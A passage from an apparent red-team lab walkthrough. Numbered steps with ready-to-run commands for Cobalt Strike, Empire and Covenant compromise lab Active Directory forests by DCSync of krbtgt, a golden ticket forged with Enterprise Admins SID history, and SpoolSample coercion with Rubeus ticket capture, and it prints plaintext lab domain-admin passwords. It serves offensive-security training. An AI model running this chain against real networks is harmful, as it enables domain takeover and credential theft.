PowerShellRemotingGrunt /computername:"dev-dc01.dev.draconem.corp" /launcher:"PowerShell" /domain:"dev.draconem.corp" /username:"Sarah.Szepe" /password:"A5jKJ9dw8ra6VZ%&"
79. Perform a DCSync attack against the dev\krbtgt user to obtain the krbtgt NTLM hash of dev.draconem.corp.
dcsync dev\krbtgt
80. Now we also need the SID of the parent domain draconem.corp. We can enumerate this by importing PowerView using the built-in PowerShellImport task.
PowerShellImport
powershell get-domaintrust -API
We will now impersonate Administrator on the draconem.corp domain by adding the well-known group 519 (Enterprise Admins) to our ticket, and adding <SID of draconem.corp>-519 to the SID history of the ticket:
Attention
Your SIDs will likely be different than the example, same for your krbtgt hash!!
81.
Assembly /assemblyname:"Rubeus" /parameters:"golden /aes256:<YOUR AES256 KRBTGT HASH> /user:administrator /domain:dev.draconem.corp /ldap /sids:<YOUR DRACONEM.CORP SID>-519 /newpac /ptt"
82. Finally, we can perform a DCSync attack toward draconem.corp from dev.draconem.corp.
dcsync draconem\krbtgt draconem.corp
Hopping the Trust: Tree-Root
In this attack path, we will utilize Spoolsample to trigger authentication from DC01.thunderbird.corp to DC01.draconem.corp
We can then pass-the-ticket of the DC and ultimately DCSync the thunderbird domain.
Attention
As a reminder, to monitor for tickets, we will need a Grunt/Agent running in high integrity.
As a second reminder, in case of Empire, be sure to spawn an additional agent because you will freeze your agent whilst monitoring, and ultimately lose the agent completely when done.
In case you need to spawn new beacons/agents/grunts on DC01.draconem.corp, one of the domain admin credentials is as follows:
Almeria.Zanelli
e$Ccj!W49E57#aS6
xfreerdp +clipboard /cert-ignore /u:Almeria.Zanelli /p:'e$Ccj!W49E57#aS6' /v:dc01.draconem.corp
Make sure to spawn your implant in high integrity (run as admin)
Cobalt Strike Approach
83. Let's start up Rubeus in monitor mode.
execute-assembly c:\Tools\Rubeus.exe monitor /targetuser:tbird-dc01$ /interval:5 /nowrap
84. We will use SpoolSample.exe to coerce authentication from tbird-dc01.thunderbird.corp to dc01.draconem.corp
execute-assembly c:\Tools\SpoolSample.exe tbird-dc01.thunderbird.corp dc01.draconem.corp
If everything went right, Rubeus should have picked up a ticket by now.
85. Go ahead and import the ticket using Rubeus ptt.
execute-assembly C:\Tools\Rubeus.exe ptt /ticket:<whatever ticket you intercepted>
86. Finally, proceed to DCSync thunderbird\krbtgt.
dcsync thunderbird.corp thunderbird\krbtgt
Enjoy the krbtgt hash of the thunderbird.corp domain!
Empire Approach
87. Let's start up Rubeus in monitor mode on agent 1. We will use the runfor and consoleoutfile functionality of Rubeus, as we will effectively "sacrifice" this agent just for monitoring.
- Technique:powershell/credentials/rubeus
- Command:monitor /targetuser:TBIRD-DC01$ /interval:2 /runfor:300 /consoleoutfile:C:\Users\Public\debug.log /nowrap
88. On agent 2, we will use
- Techniques:powershell/management/invoke_script
- Scriptcmd:Invoke-SpoolSample -Command "tbird-dc01.thunderbird.corp dc01.draconem.corp"
- ScriptPath:/home/sec565/tools/Invoke-SpoolSample.ps1
Task to coerce authentication from tbird-dc01.thunderbird.corp to dc01.draconem.corp
89. As expected, agent 1 will now be "lost". On agent 2, go to the file browser tab and download the debug.log file that we specified in our monitor command:
90. Open up the debug.log file. If you are unsure where it is check your Empire server logs:
91. Now that we have intercepted the TGT of tbird-dc01 we will be able to import it. As usual, make a sacrificial session first.
- Technique:csharp/Sharpsploit.Credentials/MakeToken
- Domain:thunderbird.corp
92. After creating the sacrificial session, go ahead and import the ticket using Rubeus ptt.
- Technique:powershell/credentials/rubeus
- Command:ptt /ticket:ticket you intercepted
93. Finally proceed to DCSync thunderbird\krbtgt.
- Technique:powershell/credentials/mimikatz/dcsync
- user:thunderbird\krbtgt
- domain:thunderbird.corp
Enjoy the krbtgt hash of the thunderbird.corp domain!:
BONUS: Covenant Approach
94. Let's start up Rubeus in monitor mode.
rubeus monitor /targetuser:tbird-dc01$ /interval:5 /nowrap
95. We will use SpoolSample.exe to coerce authentication from tbird-dc01.thunderbird.corp to dc01.draconem.corp
Assembly /assemblyname:"SpoolSample" /parameters:"tbird-dc01.thunderbird.corp dc01.draconem.corp"
If everything went right, Rubeus should have picked up a ticket by now.
96. Now that we have intercepted the TGT of tbird-dc01 we will be able to import it. As usual, make a sacrificial session first.
maketoken sacrificalsession thunderbird.corp noidea
97. After creating the sacrificial session, go ahead and import the ticket using Rubeus ptt.
rubeus ptt /ticket:<whatever ticket you intercepted>
98. Finally, proceed to DCSync thunderbird\krbtgt.
dcsync thunderbird\krbtgt thunderbird.corp
Enjoy the krbtgt hash of the thunderbird.corp domain!


























































































